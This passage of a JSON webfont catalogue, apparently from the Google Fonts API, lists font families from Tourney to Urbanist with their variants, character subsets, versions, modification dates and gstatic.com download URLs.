\"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GCwFyZTp1I1LcGA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7G5wZyZTp1I1LcGA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7G3gZyZTp1I1LcGA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GuQZyZTp1I1LcGA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GkAZyZTp1I1LcGA.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UKaJzBxAVfMGOPb.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UIaJjBxAVfMGOPb.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8ULEJjBxAVfMGOPb.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UKaJjBxAVfMGOPb.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UKoJjBxAVfMGOPb.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UJEITBxAVfMGOPb.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UJ9ITBxAVfMGOPb.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UIaITBxAVfMGOPb.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UIzITBxAVfMGOPb.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Trade Winds\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tradewinds/v17/AYCPpXPpYNIIT7h8-QenM3Jq7PKP5Z_G.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Train One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/trainone/v13/gyB-hwkiNtc6KnxUVjWHOqbZRY7JVQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Trirong\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/trirong/v11/7r3EqXNgp8wxdOdOl-go3YRl6ujngw.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/trirong/v11/7r3CqXNgp8wxdOdOn44QuY5hyO33g8IY.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOl0QJ_a5L5uH-mts.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QFa9B4sP7itsB5g.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOlyAK_a5L5uH-mts.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QcaxB4sP7itsB5g.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/trirong/v11/7r3GqXNgp8wxdOdOr4wi2aZg-ug.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/trirong/v11/7r3EqXNgp8wxdOdOn44o3YRl6ujngw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOl3gL_a5L5uH-mts.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QKa1B4sP7itsB5g.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOl1QM_a5L5uH-mts.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QBapB4sP7itsB5g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOlzAN_a5L5uH-mts.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QYatB4sP7itsB5g.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOlywO_a5L5uH-mts.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QfahB4sP7itsB5g.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOlwgP_a5L5uH-mts.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QWalB4sP7itsB5g.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Trispace\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbH9qoQl0zHugpt0.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbP9roQl0zHugpt0.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbCFroQl0zHugpt0.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbH9roQl0zHugpt0.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbE1roQl0zHugpt0.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbKFsoQl0zHugpt0.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbJhsoQl0zHugpt0.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbP9soQl0zHugpt0.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Trocchi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/trocchi/v14/qWcqB6WkuIDxDZLcDrtUvMeTYD0.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Trochut\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/trochut/v20/CHyjV-fDDlP9bDIw5nSIfVIPLns.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/trochut/v20/CHyhV-fDDlP9bDIw1naCeXAKPns8jw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/trochut/v20/CHymV-fDDlP9bDIw3sinWVokMnIllmA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Truculenta\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMlAjswcFHnJMMhg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMtAiswcFHnJMMhg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMg4iswcFHnJMMhg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMlAiswcFHnJMMhg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMmIiswcFHnJMMhg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMo4lswcFHnJMMhg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMrclswcFHnJMMhg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMtAlswcFHnJMMhg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMvklswcFHnJMMhg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Trykker\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/trykker/v21/KtktALyWZJXudUPzhNnoOd2j22U.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Tulpen One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/tulpenone/v21/dFa6ZfeC474skLgesc0CWj0w_HyIRlE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Turret Road\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/turretroad/v7/pxidypMgpcBFjE84Zv-fE0ONEdeLYk1Mq3ap.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/turretroad/v7/pxidypMgpcBFjE84Zv-fE0PpEteLYk1Mq3ap.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/turretroad/v7/pxiAypMgpcBFjE84Zv-fE3tFOvODSVFF.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/turretroad/v7/pxidypMgpcBFjE84Zv-fE0OxE9eLYk1Mq3ap.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/turretroad/v7/pxidypMgpcBFjE84Zv-fE0P5FdeLYk1Mq3ap.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/turretroad/v7/pxidypMgpcBFjE84Zv-fE0PlFteLYk1Mq3ap.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Twinkle Star\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/twinklestar/v3/pe0pMI6IL4dPoFl9LGEmY6WaA_Rue1UwVg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ubuntu\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoC1CzTt2aMH4V_gg.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/ubuntu/v20/4iCp6KVjbNBYlgoKejZftWyIPYBvgpUI.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgo6eAT3v02QFg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ubuntu/v20/4iCu6KVjbNBYlgoKeg7znUiAFpxm.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoCjC3Tt2aMH4V_gg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/ubuntu/v20/4iCp6KVjbNBYlgoKejYHtGyIPYBvgpUI.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoCxCvTt2aMH4V_gg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/ubuntu/v20/4iCp6KVjbNBYlgoKejZPsmyIPYBvgpUI.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ubuntu Condensed\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ubuntucondensed/v16/u-4k0rCzjgs5J7oXnJcM_0kACGMtf-fVqvHoJXw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ubuntu Mono\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ubuntumono/v15/KFOjCneDtsqEr0keqCMhbBc9AMX6lJBP.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ubuntumono/v15/KFOhCneDtsqEr0keqCMhbCc_CsHYkYBPY3o.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ubuntumono/v15/KFO-CneDtsqEr0keqCMhbC-BL-Hyv4xGemO1.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/ubuntumono/v15/KFO8CneDtsqEr0keqCMhbCc_Mn33tYhkf3O1GVg.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Uchen\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"tibetan\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/uchen/v7/nKKZ-GokGZ1baIaSEQGodLxA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ultra\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ultra/v19/zOLy4prXmrtY-tT6yLOD6NxF.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Unbounded\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/unbounded/v3/Yq6F-LOTXCb04q32xlpat-6uR42XTqtG65jx043HgP6LR0Y.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/unbounded/v3/Yq6F-LOTXCb04q32xlpat-6uR42XTqtG60bx043HgP6LR0Y.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/unbounded/v3/Yq6F-LOTXCb04q32xlpat-6uR42XTqtG6xjx043HgP6LR0Y.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/unbounded/v3/Yq6F-LOTXCb04q32xlpat-6uR42XTqtG6yrx043HgP6LR0Y.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/unbounded/v3/Yq6F-LOTXCb04q32xlpat-6uR42XTqtG68b2043HgP6LR0Y.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/unbounded/v3/Yq6F-LOTXCb04q32xlpat-6uR42XTqtG6__2043HgP6LR0Y.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/unbounded/v3/Yq6F-LOTXCb04q32xlpat-6uR42XTqtG65j2043HgP6LR0Y.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/unbounded/v3/Yq6F-LOTXCb04q32xlpat-6uR42XTqtG67H2043HgP6LR0Y.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Uncial Antiqua\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/uncialantiqua/v20/N0bM2S5WOex4OUbESzoESK-i-PfRS5VBBSSF.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Underdog\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/underdog/v22/CHygV-jCElj7diMroVSiU14GN2Il.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Unica One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/unicaone/v13/DPEuYwWHyAYGVTSmalshdtffuEY7FA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"UnifrakturCook\",\n      \"variants\": [\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"700\": \"http://fonts.gstatic.com/s/unifrakturcook/v19/IurA6Yli8YOdcoky-0PTTdkm56n05Uw13ILXs-h6.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"UnifrakturMaguntia\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/unifrakturmaguntia/v16/WWXPlieVYwiGNomYU-ciRLRvEmK7oaVun2xNNgNa1A.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Unkempt\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/unkempt/v19/2EbnL-Z2DFZue0DSSYYf8z2Yt_c.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/unkempt/v19/2EbiL-Z2DFZue0DScTow1zWzq_5uT84.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Unlock\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/unlock/v22/7Au-p_8ykD-cDl7GKAjSwkUVOQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Unna\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/unna/v21/AYCEpXzofN0NCpgBlGHCWFM.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/unna/v21/AYCKpXzofN0NOpoLkEPHSFNyxw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/unna/v21/AYCLpXzofN0NMiQusGnpRFpr3vc.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/unna/v21/AYCJpXzofN0NOpozLGzjQHhuzvef5Q.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Updock\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/updock/v2/nuF4D_3dVZ70UI9SjLK3602XBw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Urbanist\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDyx8fFpOrS8SlKw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDSx4fFpOrS8SlKw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDlR4fFpOrS8SlKw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDyx4fFpOrS8SlKw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqD-R4fFpOrS8SlKw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDFRkfFpOrS8SlKw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDLBkfFpOrS8SlKw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDSxkfFpOrS8SlKw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDYhkfFpOrS8SlKw.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA133VJmvacG1K4S1.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA113VZmvacG1K4S1.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA12pVZmvacG1K4S1.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA133VZmvacG1K4S1.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA13FVZmvacG1K4S1.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA10pUpmvacG1K4S1.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA10QUpmvacG1K4S1.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA113UpmvacG1K4S1.ttf\",\n        \"900italic\": 